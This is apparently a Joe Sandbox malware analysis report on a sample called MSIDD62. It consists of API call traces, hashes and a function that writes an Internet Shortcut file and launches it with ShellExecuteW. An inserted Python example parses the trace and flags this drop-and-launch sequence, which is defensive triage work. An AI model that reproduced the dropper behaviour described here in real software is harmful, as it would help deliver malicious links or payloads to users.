• Instruction Fuzzy Hash: 45F028B63003045FDB149F39A881A7B7BA1FFC0358B54802EF94587A40D6B99D028604
APIs
  • Part of subcall function 004172CA: EnterCriticalSection.KERNEL32(?,?,0042163A,00000000,004411A8,0000000C,00421601,?,?,0041C75E,?,?,0041AFDA,00000001,00000364,?), ref: 004172D9
• EnumSystemLocalesW.KERNEL32(0041C795,00000001,004410C8,0000000C,0041CBC4,00000000), ref: 0041C7DA
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 08854aaee2c85e14520ff5749bb74ad9414cf6d0f074ddbe655a6b27159cbab8
• Instruction ID: 2aff5c87d2e1f47609c46464756907b167827dcc76e8be531a13019df8d2861c
• Opcode Fuzzy Hash: 08854aaee2c85e14520ff5749bb74ad9414cf6d0f074ddbe655a6b27159cbab8
• Instruction Fuzzy Hash: B3F03C76A40604EFD710EF58E842B9D77F0FB09725F20416BF4109B2A1DB7949848F48
APIs
• GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00404EEC,00000000,0043B6C9,00000004,00403D92,0043B6C9,00000004,004041A5,00000000,00000000), ref: 004071DA
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 2a977141dbe8eabc822da48366f6ebbf5fd0663cccfbde867b69ba2db6ad93a2
• Instruction ID: 396f290ad7189e7b3697af71bb85d87f49c9823eed498697b4849688c2a10cc6
• Opcode Fuzzy Hash: 2a977141dbe8eabc822da48366f6ebbf5fd0663cccfbde867b69ba2db6ad93a2
• Instruction Fuzzy Hash: 6CE0D172A58104B6D7159BBC9D1FF6B36E8D704709F504156F103F92C1C678DA01E15A
APIs
  • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
  • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
• EnumSystemLocalesW.KERNEL32(0042360F,00000001,?,?,?,00423E7A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004236ED
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: fd398aa86cbff818c0e05eab00ca5c877d3aaf3042fda12b64d32b89ed820614
• Instruction ID: 7326562db07ec836f1383128ae8d0bf059db6235a19938b15973d7c02eb557e5
• Opcode Fuzzy Hash: fd398aa86cbff818c0e05eab00ca5c877d3aaf3042fda12b64d32b89ed820614
• Instruction Fuzzy Hash: 69F0553630030967CB24AF3AE80667A7FA8EFC1711B86006AEA09CB350C279D943C758
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041A4B1,?,20001004,00000000,00000002,?,?,00419AB3), ref: 0041CD53
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 993213dab89549fd462f7762d937425c7af20179551cb4dd8dcd48253b853b5d
• Instruction ID: b498b8ec66d7c41fa0aba70d57ca67a6df150d87393759233cdfba895d7d5bb4
• Opcode Fuzzy Hash: 993213dab89549fd462f7762d937425c7af20179551cb4dd8dcd48253b853b5d
• Instruction Fuzzy Hash: 34E04F35581218BBCF122F61EC45AEE7F26EF44751F004036FD0566221CB358962AAE9
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0002855F,00407E51), ref: 00408558
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 0aad11e7ee877d765d84656ddd848d794259b4e5cafb53358a375b71dd5f0076
• Instruction ID: ab45f7bc7acfb16dd5ac8dd98b002b9a080bf8c78aaaf9fad26a1aebec1d9694
• Opcode Fuzzy Hash: 0aad11e7ee877d765d84656ddd848d794259b4e5cafb53358a375b71dd5f0076
• Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
• Instruction ID: 6b4ff145f44d533ad68088221f6a609ab1d7e04152a0c561df1f7ba61bbcd93e
• Opcode Fuzzy Hash: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
• Instruction Fuzzy Hash: 80327E74A0020ADFCB14CF98C981AFEBBB5EF45304F1641AED845A7345D636EE86CB84
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12010c70137e7c29a5ca23235328cbf3d08dc96dda7289a0ae066cc07d919471
• Instruction ID: 383cb9d78dabc5fc5b9186f807fcaf2870c9c8999f123528d0909e821e960bcd
• Opcode Fuzzy Hash: 12010c70137e7c29a5ca23235328cbf3d08dc96dda7289a0ae066cc07d919471
• Instruction Fuzzy Hash: CF325531D29F014DD7278635CA22336A659AFB73C4F15D737F81AB5AAAEB28C4C74104
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 3471368781-0
• Opcode ID: fe5be6a6468e820d3e9a1c319386152d4de0f2e029eb669445a27b1e5cc178ee
• Instruction ID: 76a18fbcd87e0a5d74895dda48ffde4bc3b525ccaaadd8d74c7dbcd01c42bc64
• Opcode Fuzzy Hash: fe5be6a6468e820d3e9a1c319386152d4de0f2e029eb669445a27b1e5cc178ee
• Instruction Fuzzy Hash: E6B117356003119BDB349F25DC82BB7B3B8EF54309F94456EE943C6684EABCEA85C718
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
• Instruction ID: 2e46453ac14beeb106431154d774e16853efbb2cb2d74362cb225ff0eef1ff33
• Opcode Fuzzy Hash: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
• Instruction Fuzzy Hash: 11518271E01219AFDF04CF99C991AEEBBB2EF88300F19805DE515AB311C7349E91CB94
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: cfaf17e61477827595cba3094808e06514427db43c5861e402f0a767dca774d8
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: 881131BB261142C3D6148E3DC8F49B7E395EBC5321B2C437BD0426B7DAD23ADD459508
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
• Instruction ID: 84d9c5769a8bb5f32b96c16cbcb1e23c183e5fbff20d869f038de853226c9690
• Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
• Instruction Fuzzy Hash: 52E04632A11238EBCB15EB999944A8AF2ECEB48B44B5144ABB601D3212C278DE40C7D4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                      • Instruction ID: f98ca3f34d964046128fa04824a014a5ee727e8ff748864cd89c599bd9132bf2
                                                                      • Opcode Fuzzy Hash: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                      • Instruction Fuzzy Hash: 0DC08C34100A0187CE398A1082B13EE3394B791786F80098EC81A0BF42DD1F9CC2D644

                                                                      Control-flow Graph (function 003E8790-003E8B92; the rendered graph is not reproduced, block addresses and calls are taken from the graph data)
                                                                      • 3e8790: calls 3e5880 and 3e9620, then CreateFileW at 3e87fa (followed by call 3e3cc0); one successor goes straight to the exit block 3e8b5f, the other continues at 3e8830.
                                                                      • 3e8853-3e8894: WideCharToMultiByte, LocalAlloc, WideCharToMultiByte (size query followed by conversion), then a per-character loop over 3e88c6-3e8946.
                                                                      • 3e894c: WriteFile, CloseHandle.
                                                                      • 3e89a5-3e89ef: MultiByteToWideChar, LocalAlloc, MultiByteToWideChar; 3e8a82: LocalFree.
                                                                      • 3e8aba: ShellExecuteW (preceded by call 3e9620, optionally followed by call 3e9020); 3e8b11: second ShellExecuteW (same surrounding calls); both paths reach 3e8b3d (LocalFree) and then the exit block 3e8b5f (call 3e3cc0, call 407708).
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003E880D
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 003E8860
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E886F
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 003E888B
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E896B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8977
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89B3
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89D2
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E89EF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8A83
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 003E8ACE
                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 003E8B1C
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8B4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                      • API String ID: 2199533872-3004881174
                                                                      • Opcode ID: 4574cc4f65deb903a0c11da430621fd06e1fcf6f02bdd8fb4567947fb30f4143
                                                                      • Instruction ID: 000e0b3d755107beeca03cfc3682ea500d31fae4206c30f3601c23897161b052
                                                                      • Opcode Fuzzy Hash: 4574cc4f65deb903a0c11da430621fd06e1fcf6f02bdd8fb4567947fb30f4143
                                                                      • Instruction Fuzzy Hash: F1C13771E002959FEB22CF69CC45BBFBBB5EF54700F54422AE908AB2C1EB748905C795
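The trace for the function at 003E8790 reads as a drop-and-launch: a file is created for writing, content built from the `[InternetShortcut]` and `URL=` strings is written to it, and the file is handed to ShellExecuteW with the `open` verb. The Python below is added here as an example and is not part of the Joe Sandbox report or the sample: it parses the API lines above (copied from the report), names the raw constants in them (0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS, 0x80 = FILE_ATTRIBUTE_NORMAL, 0xFDE9 = CP_UTF8, 5 = SW_SHOW, 0x40 = LMEM_ZEROINIT, all documented SDK values), flags the CreateFileW-for-write, WriteFile, ShellExecuteW sequence, and extracts the target from a `.url` body. The `.url` body is constructed, since the report shows only the format strings, and every function name is this example's own.

```python
"""Added example: decode the Joe Sandbox API trace of the function at 003E8790
into named Win32 constants, flag the drop-then-launch sequence it describes,
and extract the URL from an [InternetShortcut] file body.
The API lines are copied from the report; the .url body is constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Copied from the report's API list for 003E8790 (only the calls needed here).
REPORT_LINES = """
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003E880D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 003E8860
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E886F
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E896B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E8977
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 003E8ACE
• ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 003E8B1C
"""

# Documented Win32 values (SDK headers), not taken from the report.
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRIBUTE_NORMAL = 0x80
CP_UTF8 = 65001        # shown as 0000FDE9 in the trace
SW_SHOW = 5
LMEM_ZEROINIT = 0x40

API_LINE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
Call = Tuple[str, List[str], int]   # (api, raw args, ref address)


def parse_api_lines(text: str) -> List[Call]:
    """Parse '• Api.MODULE(args), ref: ADDR' lines; unrecovered args stay '?'."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            api, _module, raw, ref = m.groups()
            calls.append((api, [a.strip() for a in raw.split(",")], int(ref, 16)))
    return calls


def _num(arg: str) -> Optional[int]:
    """Hex argument -> int; '?' or a string literal such as 'open' -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode(api: str, args: List[str]) -> Dict[str, str]:
    """Name the security-relevant arguments of the calls this trace uses."""
    n = [_num(a) for a in args]
    if api == "CreateFileW" and len(n) >= 6:
        access = [name for bit, name in ((GENERIC_READ, "GENERIC_READ"),
                                          (GENERIC_WRITE, "GENERIC_WRITE"))
                  if (n[1] or 0) & bit]
        return {"access": "|".join(access) or hex(n[1] or 0),
                "disposition": DISPOSITIONS.get(n[4], str(n[4])),
                "attributes": "FILE_ATTRIBUTE_NORMAL" if n[5] == FILE_ATTRIBUTE_NORMAL else str(n[5])}
    if api in ("WideCharToMultiByte", "MultiByteToWideChar") and n:
        return {"codepage": "CP_UTF8" if n[0] == CP_UTF8 else str(n[0])}
    if api == "ShellExecuteW" and len(n) >= 6:
        # A zero lpOperation means the shell picks the file type's default verb.
        verb = "NULL (default verb)" if n[1] == 0 else args[1]
        return {"verb": verb, "show": "SW_SHOW" if n[5] == SW_SHOW else str(n[5])}
    if api == "LocalAlloc" and n:
        return {"flags": "LMEM_ZEROINIT" if n[0] == LMEM_ZEROINIT else hex(n[0] or 0)}
    return {}


def find_drop_and_launch(calls: List[Call]) -> Optional[List[int]]:
    """Refs of CreateFileW(write) -> WriteFile -> ShellExecuteW, in order, else None."""
    want, refs = ["CreateFileW", "WriteFile", "ShellExecuteW"], []
    for api, args, ref in calls:
        if api != want[len(refs)]:
            continue
        if api == "CreateFileW" and "GENERIC_WRITE" not in decode(api, args).get("access", ""):
            continue
        refs.append(ref)
        if len(refs) == len(want):
            return refs
    return None


URL_LINE = re.compile(r"^\s*URL\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)


def url_from_internet_shortcut(body: str) -> Optional[str]:
    """Extract the URL= target from an [InternetShortcut] file body, if present."""
    if "[InternetShortcut]" not in body:
        return None
    m = URL_LINE.search(body)
    return m.group(1) if m else None


# Constructed .url body; the report shows only the "[InternetShortcut]" and "URL=" strings.
SAMPLE_URL_FILE = "[InternetShortcut]\r\nURL=https://example.invalid/path?x=1\r\n"

if __name__ == "__main__":
    calls = parse_api_lines(REPORT_LINES)
    for api, args, ref in calls:
        print(f"{ref:08X} {api:<20} {decode(api, args)}")
    print("drop-and-launch refs:", [hex(r) for r in find_drop_and_launch(calls) or []])
    print("shortcut target:", url_from_internet_shortcut(SAMPLE_URL_FILE))
```

A `.url` file passed to ShellExecuteW is opened by the shell's URL handler, so the destination lives in the dropped file rather than on any process command line; when triaging, recover the file path (shown as `?` in the trace) from the report's file-system activity and read the `URL=` line out of it rather than relying on the process tree.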
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00444AF8,00000FA0,?,?,00407747), ref: 00407775
                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00407747), ref: 00407780
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00407747), ref: 00407791
                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004077A3
                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004077B1
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00407747), ref: 004077D4
                                                                      • DeleteCriticalSection.KERNEL32(00444AF8,00000007,?,?,00407747), ref: 004077F0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00407747), ref: 00407800
                                                                      Strings
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040777B
                                                                      • SleepConditionVariableCS, xrefs: 0040779D
                                                                      • WakeAllConditionVariable, xrefs: 004077A9
                                                                      • kernel32.dll, xrefs: 0040778C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 2565136772-3242537097
                                                                      • Opcode ID: 7b421de30c2e04610d4bf51028c0678acc6ac9ddc176320bc9bc560cdd319a21
                                                                      • Instruction ID: a2608d3d7a5849c9e50d4e3015302c50aa918e90dbb92a50b7191df86b630915
                                                                      • Opcode Fuzzy Hash: 7b421de30c2e04610d4bf51028c0678acc6ac9ddc176320bc9bc560cdd319a21
                                                                      • Instruction Fuzzy Hash: F501B535F407115BD7311B75BC0DF273A58AB85B81B550036B801F36A0DBB8E80186BE
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00404F27
                                                                      • collate.LIBCPMT ref: 00404F33
                                                                        • Part of subcall function 00403E70: __EH_prolog3_GS.LIBCMT ref: 00403E77
                                                                        • Part of subcall function 00403E70: __Getcoll.LIBCPMT ref: 00403EDB
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • __Getcoll.LIBCPMT ref: 00404F76
                                                                        • Part of subcall function 00403CD4: __EH_prolog3.LIBCMT ref: 00403CDB
                                                                        • Part of subcall function 00403CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00403CE5
                                                                        • Part of subcall function 00403CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00403D56
                                                                        • Part of subcall function 003F4403: __EH_prolog3.LIBCMT ref: 003F440A
                                                                        • Part of subcall function 003F4403: std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                        • Part of subcall function 003F4403: std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • numpunct.LIBCPMT ref: 004051A6
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
